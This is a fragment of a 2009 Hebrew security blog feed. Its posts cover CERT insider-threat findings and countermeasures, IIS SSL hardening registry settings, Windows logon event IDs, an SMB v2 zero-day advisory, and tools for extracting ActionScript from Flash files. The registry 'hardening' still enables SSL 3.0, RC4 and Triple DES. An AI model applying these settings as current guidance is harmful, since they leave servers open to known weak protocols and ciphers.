gd:etag="W/&quot;D04MRHc5fip7ImA9WxNUEE8.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-7260194696098790182</id><published>2009-10-31T19:37:00.007+02:00</published><updated>2009-10-31T23:53:05.926+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-10-31T23:53:05.926+02:00</app:edited><title>האיום הפנימי - הגדרה ודרכים להתמודדות</title><content type="html">הגדרה : עובד מועסק או מועסק לשעבר , שותף עסקי נוכחי או לשעבר שיש או שהיה לו גישה למערכות המידע של החברה ,וביצע בכוונת זדון שימוש לרעה,שיבוש,מחיקה &lt;span id="SPELLING_ERROR_0" class="blsp-spelling-error"&gt;וכו&lt;/span&gt; במידע .&lt;br /&gt;&lt;br /&gt;ההגדרה הורחבה לאחרונה גם לשותפים עסקיים,ספקים &lt;span id="SPELLING_ERROR_1" class="blsp-spelling-error"&gt;וכו&lt;/span&gt; בשל הנטייה ההולכת וגוברת של הוצאת תהליכים ותמיכה במערכות המידע למיקור חוץ ( &lt;a class="spell" href="http://www.google.com/search?hl=en&amp;amp;rlz=1I7GFRE_en&amp;amp;ei=NHjsStKyOZa9jAeFqoHHAg&amp;amp;sa=X&amp;amp;oi=spell&amp;amp;resnum=0&amp;amp;ct=result&amp;amp;cd=1&amp;amp;ved=0CAgQBSgA&amp;amp;q=outsourcing&amp;amp;spell=1"&gt;outsourcing&lt;/a&gt; ) , החל בחיבורים לצורך תמיכה במערכות מרכזיות כגוןWEB ,DATABASES,STORAGE וכלה בהוצאת קמפיינים , DATA MINING ומשימות אחרות לחברות צד שלישי וספקים.&lt;br /&gt;&lt;br /&gt;ארגון CERT האמריאי ערך מחקר מקיף החל מ 1996 ועד היום וניתח קרוב ל 300 מקרים של התקפות ע"י גורמים המוגדרים פנימיים.&lt;br /&gt;&lt;br /&gt;להלן חלק מהמסקנות שהגיעו אליהם:&lt;br /&gt;&lt;br /&gt;ניתן לחלק את ההתקפות לשלוש קטגוריות מרכזיות:&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;strong&gt;חבלה&lt;/strong&gt; - במקרים אלו התוקף מעוניין לגרום נזק לארגון או לאדם בארגון, מחיקת מידע , הורדת מערכות ,והפרעה לאופרציה הנורמלית בארגון - מתוך 300 - כ 100 מוגדרות כנסיון חבלה.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;גנבת קניין רוחני&lt;/strong&gt;- במקרים אלו התוקף גונב סודות חברה,תוכניות חברה,קוד פיתוח,תוכניות אסטרטגיות וכו . כ 40 מתוך ה 300 מוגדרים כגנבת קניין רוחני.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;גניבה או טיפול במידע לצורך רווח כספי&lt;/strong&gt; - בקטגורה זו נכללים גניבת או שינוי פרטים אישיים , כרטיסי אשראי וכו לצורך מכירה של המידע בשלב מאוחר יותר , ברוב המקרים התוקף הפנימי מקבל תשלום ע"י גורם חיצוני לביצוע העברה. כ 106 מקרים הם מסוג זה .&lt;/li&gt;&lt;li&gt;&lt;strong&gt;MISC &lt;/strong&gt;- כ 46 מקרים בהן אין מספיק ראיות או מידע לשייך את ההתקפה לאחת מהקטגוריות.&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;כמובן שחלק מהמקרים מתפרסים על כמה קטגוריות ביחד.&lt;/p&gt;&lt;p&gt;50% מעובדים שביצעו עבירות מסוג זה החזיק במשרה טכנית בארגון.&lt;/p&gt;&lt;p&gt;נקודות חשובות באבטחת מידע שעלו מהמקרים .&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;ברמת ניהול הסיכונים&lt;/strong&gt; - יש להרחיב את מעגל האבטחה שיכלול את כל קבלני המשנה,נותני התמיכה,וספקים חיצוניים בעלי גישה למידע אירגוני - הקשחת והגבלת הגישה למשאבים ע"י גורמים אילו,ניטור ומעקב ככל הניתן לפעולות הנעשות ע"י הגורמים החיצוניים בתוך הארגון וכן ניתוק מידי של הקבלן בתום העסקתו עשויים למנוע התקפות דרך גורמים אלו&lt;/li&gt;&lt;li&gt;&lt;strong&gt;need to know bases&lt;/strong&gt; - ניתוח המקרים מעלה שברוב המקרים התוקף קיבל הרשאות גישה גבוהות בהרבה ממה שהיה צריך לעבודתו , באחד מהמקרים מצויין כי איש מכירות הצליח לגנוב קוד מקור של מוצר וזאת מכיוון שהיתה לו הרשאה לספריה שהיכילה קוד זה .הגבלת ההרשאות לצרכי עבודה היתה מונעת מקרה זה.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;הפרדת רשויות&lt;/strong&gt; - פיצול פעולות קריטיות לגורם מאשר וגורם מבצע - בחקירת המקרים התגלה כי למרות שהפרדה זו קיימת ,במקרים רבים אין אכיפה באמצעים טכניים וגם אם קיימת , היא לא מבוצעת נכון. ברוב במקרים הפרדות אלו קיימות בעיקר "על הנייר".&lt;/li&gt;&lt;li&gt;&lt;strong&gt;הפרדת ופיצול הרשאות בתוך קבוצת ה system administrators&lt;/strong&gt; - מחקירת המקרים עלה שלא כל מנהלי הרשת צריכם גישה לניהול כל הרשת :) יש לנסות להפריד הרשאות גם בתוך הקבוצה הזאת דוגמא למיקרה שהובא היתה ,מנהל רשת זוטר שעמד לפני פיטורים אך עדיין היה בעל הרשאות ADMIN גורפות בארגון - דבר שאפשר לו לחבל בשרתים רבים וכן למחוק את הלוגים על פעילות זו ואף לכונונם שיצביעו על המנהל שלו כגורם האשם.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;ניהול חשבונות והרשאות&lt;/strong&gt; - המחקר מעלה שרוב פעולות החבלה התבצעו לאחר הפיטורין אך בעזרת התחברות לרשת שהוכנה מראש ע"י העובד . בדרך כלל השימוש היה בחשבונות משותפים (משתמש אפליקטיבי)test,traning,sysadmin,dba וכו ,חשבונות שקשה מאד לזהות מי בעצם המשתמש האמיתי ה"מסתתר " מאחוריהם. במיקרים רבים מנהלי רשת יצרו חשבונות שנראו לצרכים לגיטימיים אך למעשה שימשו אותם להתחברות מרחוק לארגון לאחר הפיטורין.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;סיסמאות&lt;/strong&gt; - מקרים רבים הראו כי משתמשים העבירו בינהם ססמאות בכדי לחסוך זמן ולבטל את הצורך בגורם אחד מאשר ואחד מבצע .&lt;/li&gt;&lt;li&gt;&lt;strong&gt;סיסמאות חלשות&lt;/strong&gt; - במקרים רבים מנהלי רשת וגורמים אחרים הריצו PASSWORD CRACKERS ופרצו לחשבונות ולקבצים מוגני סיסמה לצורך גניבת הרשומות.חלק מהחשבונות שנפרצו שימשו להם לאחר הפיטורים דרך להתחבר לארגון.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;auditing and log mamagment&lt;/strong&gt; - במקרים רבים נראו גישה לשרתים רגישים והורדת downloads כמות גדולה של קבצים ,פרט מעניין נוסף הוא שרוב הפעולות מסוג זה נעשו בחלון זמן של 3-1 חודשים לפני פיטורי עובד או התפטרות - בדיקה של תבניות כאלו יכולות לעזור בגילוי מקרים של פעולה פנימית.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;חשיבות שיתוף פעולה בין מחלקות כוח אדם , IT ,מנהלים, והבעלים של המידע&lt;/strong&gt; - חקירת המקרים מעלה שלא די באמצעי IT ( טכניים) בלבד לזיהוי פשע ההולך להיתבצע אלא חייב שיתוף פעולה עם מחלקות כוח אדם ובעלי המידע עצמו היודעים למי הצורך במידע ולמי לא בהתאמה לגורמים כגון פיטורים, מירמור בעבודה וכו.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;FYI&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-7260194696098790182?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/koSKhDYpIoNUiF8g8mMObSB66Bg/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/koSKhDYpIoNUiF8g8mMObSB66Bg/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/koSKhDYpIoNUiF8g8mMObSB66Bg/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/koSKhDYpIoNUiF8g8mMObSB66Bg/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/7260194696098790182/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2009/10/blog-post.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/7260194696098790182?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/7260194696098790182?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2009/10/blog-post.html" title="האיום הפנימי - הגדרה ודרכים להתמודדות" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;C08NRnk8fSp7ImA9WxBUEk0.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-4319335339776128863</id><published>2009-10-20T22:56:00.008+02:00</published><updated>2010-02-26T18:31:37.775+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-02-26T18:31:37.775+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="pci" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><title>הקשחות SSL בשרתי IIS</title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;תקן PCI ותקנים נוספים מחייבים הקשחת מנגנון ה SSL HTTPS .&lt;br /&gt;
&lt;div&gt;התקן מחייב - ביטול תמיכה לאחור ב ssl v 2 והקשחת אלגוריתם ההצפנה .&lt;/div&gt;&lt;div&gt;ההקשחה מתבצעת ב REGISTRY של שרת ה IIS וניתנת לבדיקת ע"י כלי של FOUND STONE = SSLDIGGER&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;a href="http://stdout-dev-null.blogspot.com/2006/02/disable-ssl2-and-weak-ciphers-in-iis.html"&gt;http://stdout-dev-null.blogspot.com/2006/02/disable-ssl2-and-weak-ciphers-in-iis.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
השינויים:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Windows Registry Editor Version 5.00&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello\Server]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:ffffffff[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT 1.0\Server]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:ffffffff[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0\Server]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:ffffffff&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Windows Registry Editor Version 5.00&lt;br /&gt;
&lt;br /&gt;
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\DES 56/56]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\NULL]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 128/128]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 40/128]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 56/128]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 128/128]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:ffffffff[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 40/128]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 56/128]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 64/128]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\Triple DES 168/168]&lt;br /&gt;
&lt;br /&gt;
"Enabled"=dword:ffffffff&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div dir="ltr" style="text-align: left;"&gt;&lt;div dir="ltr" style="text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: #ff6666; font-family: 'courier new';"&gt;&lt;span class="Apple-style-span" style="line-height: 20px;"&gt;&lt;span class="Apple-style-span" style="color: black; font-family: Georgia, serif; font-size: 130%;"&gt;&lt;span class="Apple-style-span" style="font-size: 16px; line-height: normal;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-4319335339776128863?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/j3AXo8S8iGis2w3xnqlYFXTtus4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/j3AXo8S8iGis2w3xnqlYFXTtus4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/j3AXo8S8iGis2w3xnqlYFXTtus4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/j3AXo8S8iGis2w3xnqlYFXTtus4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/4319335339776128863/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2009/10/ssl-iis.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/4319335339776128863?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/4319335339776128863?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2009/10/ssl-iis.html" title="הקשחות SSL בשרתי IIS" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;CkECR3w9fCp7ImA9WxNQFkU.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-678023459924527121</id><published>2009-09-23T07:21:00.003+03:00</published><updated>2009-09-23T07:37:46.264+03:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-23T07:37:46.264+03:00</app:edited><title>Security Event log logon/off תיזכורת</title><content type="html">מדי פעם , אני נקרא לדגל בכדי לפענח פעילת תחנה או משתמש ברשת .&lt;br /&gt;כחלק מהבדיקות הרבות שאני מבצע , אני מתיחחס גם לEVENT LOGS בתחנה וב DC  לגבי אירועי LOGON\OFF&lt;br /&gt;אך מתקשה לזכור את ה EVENT ID הרלוונטיים.&lt;br /&gt;אז הנה רשימה קצרה לתזכורת (xp 2000):&lt;br /&gt;לרשימה המלאה:&lt;br /&gt;&lt;a href="http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/Default.aspx"&gt;http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/Default.aspx&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div align="left"&gt;528 -  Successful Logon  &lt;/div&gt;&lt;div align="left"&gt;529 -  Logon Failure - Unknown user name or bad password &lt;/div&gt;&lt;div align="left"&gt;530 -  Logon Failure - Account logon time restriction violation &lt;/div&gt;&lt;div align="left"&gt;531 -  Logon Failure - Account currently disabled &lt;/div&gt;&lt;div align="left"&gt;533 -  Logon Failure - User not allowed to logon at this computer&lt;br /&gt; 534 -  Logon Failure - The user has not been granted the requested logon type at this machine&lt;/div&gt;&lt;div align="left"&gt;535 -  Logon Failure - The specified account's password has expired &lt;/div&gt;&lt;div align="left"&gt;536 -  Logon Failure - The NetLogon component is not active&lt;/div&gt;&lt;div align="left"&gt;537 -  Logon failure - The logon attempt failed for other reasons&lt;/div&gt;&lt;div align="left"&gt;538 -  User Logoff &lt;/div&gt;&lt;div align="left"&gt;539 -  Logon Failure - Account locked out&lt;/div&gt;&lt;div align="left"&gt;551 -  User initiated logoff&lt;/div&gt;&lt;div align="left"&gt;552 -  Logon attempt using explicit credentials&lt;/div&gt;&lt;div align="left"&gt;682 -  Session reconnected to winstation &lt;/div&gt;&lt;div align="left"&gt;683 -  Session disconnected from winstation  &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-678023459924527121?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/jv7X-qXodpdpH8gpsga4d_BMXs0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/jv7X-qXodpdpH8gpsga4d_BMXs0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/jv7X-qXodpdpH8gpsga4d_BMXs0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/jv7X-qXodpdpH8gpsga4d_BMXs0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/678023459924527121/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2009/09/security-event-log-logonoff.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/678023459924527121?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/678023459924527121?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2009/09/security-event-log-logonoff.html" title="Security Event log logon/off תיזכורת" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;A0UCQHs4cCp7ImA9WxNQFko.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-5472407322970635159</id><published>2009-09-23T06:22:00.005+03:00</published><updated>2009-09-23T07:14:21.538+03:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-23T07:14:21.538+03:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="miscrosoft" /><category scheme="http://www.blogger.com/atom/ns#" term="windows security" /><category scheme="http://www.blogger.com/atom/ns#" term="patch" /><title>ZER0 DAY SMB V2</title><content type="html">&lt;span style="color:#ff0000;"&gt;FYI&lt;br /&gt;פירצת אבטחת התגלת בפרוטוקול SMB V2 שפותח ע"י מיקרוסופט ומיושם ב VISTA ו SERVER 2008&lt;br /&gt;&lt;br /&gt;לפי שעה אין PATCH המתקן את חור האבטחה .&lt;br /&gt;מיקרוסופט מציעה לבטל את השימוש בפרוטוקול זה ואף מספקת כלי ( FIXIT) המבצע זאת אוטומטית .&lt;br /&gt;ניתן לוהוריד את הכלי כאן:&lt;br /&gt;&lt;/span&gt;&lt;a href="http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx"&gt;&lt;span style="color:#ff0000;"&gt;http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#ff0000;"&gt;&lt;br /&gt;&lt;br /&gt;cve id:&lt;br /&gt;&lt;/span&gt;&lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103"&gt;&lt;span style="color:#ff0000;"&gt;CVE-2009-3103 &lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;FYI &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-5472407322970635159?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/UH3LR6tY4AXumfjgSXg0gcZ90PA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/UH3LR6tY4AXumfjgSXg0gcZ90PA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/UH3LR6tY4AXumfjgSXg0gcZ90PA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/UH3LR6tY4AXumfjgSXg0gcZ90PA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/5472407322970635159/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2009/09/zer0-day-smb-v2.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/5472407322970635159?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/5472407322970635159?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2009/09/zer0-day-smb-v2.html" title="ZER0 DAY SMB V2" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;A0cNRXc5fSp7ImA9WxNRGEQ.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-3903787661554376305</id><published>2009-09-13T07:21:00.008+03:00</published><updated>2009-09-14T06:31:34.925+03:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-14T06:31:34.925+03:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Linux security" /><category scheme="http://www.blogger.com/atom/ns#" term="flash" /><category scheme="http://www.blogger.com/atom/ns#" term="security pen testing tools" /><title>FLASH SECRETS - כלים לבדיקת ACTION SCRIPTS</title><content type="html">&lt;span class="Apple-style-span" style="font-size: small;"&gt;שיכלול טכנולוגית ה FLASH  מאפשרכיום לעשות הרבה מעבר להצגת גרפיקה .דפי LOGIN , הפניות ,ושאר ירקות מתאפשרות ע"י שימוש ב ACTION SCRIPTS .&lt;/span&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;במחקרים שעשו מצאו שהשימוש ב AS המקודד HARDCODED בקובץ ה FLASH הוא נרחב וכן רמת האבטחה בו נמוכה.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;מפתחים מטביעים שמות משתמשים וססמאות,וכן הפניות לדפים חסויים בתוך הקוד בהנחה כי אין דרך לבצע שליפה של הקוד מתוך הקובץ.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;האמנם?&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;מסתבר שאפשר וזה אפילו קל לחלץ ACTION SCRIPT מתוך קובץ SWF או כל פורמט FLASH אחר.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;ניתוח של המידע הזה מאפשר לנו להבין פגיעויות באתר הן ברמת ה FLASH עצמו והן ברמת חשיפת פרטים נוספים.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;2 כלים חינמיים שמצאתי חילוץ וניתוח AS &lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;a href="http://www.nowrap.de/download/flare06setup.exe" target="_blank"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;flare&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="https://h30406.www3.hp.com/campaigns/2009/wwcampaign/1-5TUVE/index.php?key=swf&amp;amp;jumpid=go/swfscan" target="_blank"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;hp swfScan&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;a href="https://h30406.www3.hp.com/campaigns/2009/wwcampaign/1-5TUVE/index.php?key=swf&amp;amp;jumpid=go/swfscan"&gt;&lt;/a&gt;FYI&lt;br /&gt;&lt;/span&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-3903787661554376305?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/I6fxh0xkXT3jrYdMaBZCPxScrHk/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/I6fxh0xkXT3jrYdMaBZCPxScrHk/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/I6fxh0xkXT3jrYdMaBZCPxScrHk/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/I6fxh0xkXT3jrYdMaBZCPxScrHk/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/3903787661554376305/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2009/09/flash-secrets-action-scripts.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/3903787661554376305?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/3903787661554376305?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2009/09/flash-secrets-action-scripts.html" title="FLASH SECRETS - כלים לבדיקת ACTION SCRIPTS" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;Ak8NQHY-fSp7ImA9WxNRGEQ.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-2085402255400689308</id><published>2009-09-13T06:14:00.005+03:00</published><updated>2009-09-14T06:28:11.855+03:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-14T06:28:11.855+03:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="metadata" /><category scheme="http://www.blogger.com/atom/ns#" 